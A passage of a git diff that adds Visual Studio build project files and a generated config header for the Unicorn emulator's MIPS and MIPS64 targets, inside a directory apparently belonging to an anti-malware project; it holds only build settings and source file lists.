Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + 
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + 
<GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj.filters new file mode 100644 index 
0000000..893a255 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{723b39e0-f3cc-46d9-b9e8-6fe7e38bdf26}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{19efec2a-ac41-4941-9dfc-4937f91829b4}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{0784e023-e00c-4034-adc4-9b1ad07d2eb7}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{d60f24b3-d409-40d8-b7d2-f3e71960841a}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{1c2a8ce7-cc6f-41e8-b532-a2f030f6799d}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{65e8fb9c-fe61-4100-9f0e-1eab5babb4d3}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mips.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile 
Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/config-target.h new file mode 100644 index 0000000..ca9e642 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/config-target.h @@ -0,0 +1,7 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ABI_MIPSN64 1 +#define TARGET_MIPS64 1 +#define TARGET_NAME "mips64" +#define TARGET_MIPS 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj new file mode 100644 index 0000000..4e76dc3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration 
Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mips64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> 
+ <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4A9F9353-DB63-460A-BB1C-9CB519DFD414}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mips64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import 
Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + 
<AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + 
<Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + 
<ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj.filters new file mode 100644 index 0000000..c5aac69 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{d5143bfc-0d98-4c10-aa97-eddbc37aca5e}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{c27c2a6c-adb5-4f4a-ae2d-778d1aff259e}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{39b8b5d5-ffa1-4eb6-ab78-2edb05e49e84}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{a4e58c5f-5143-4c18-b291-2f472259d6d9}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{bbe2ce8b-4fcd-496e-9f45-6f65ada00d84}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{3c66ada6-0f5f-40f5-a62c-c6dee6596791}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + 
</ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mips64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + 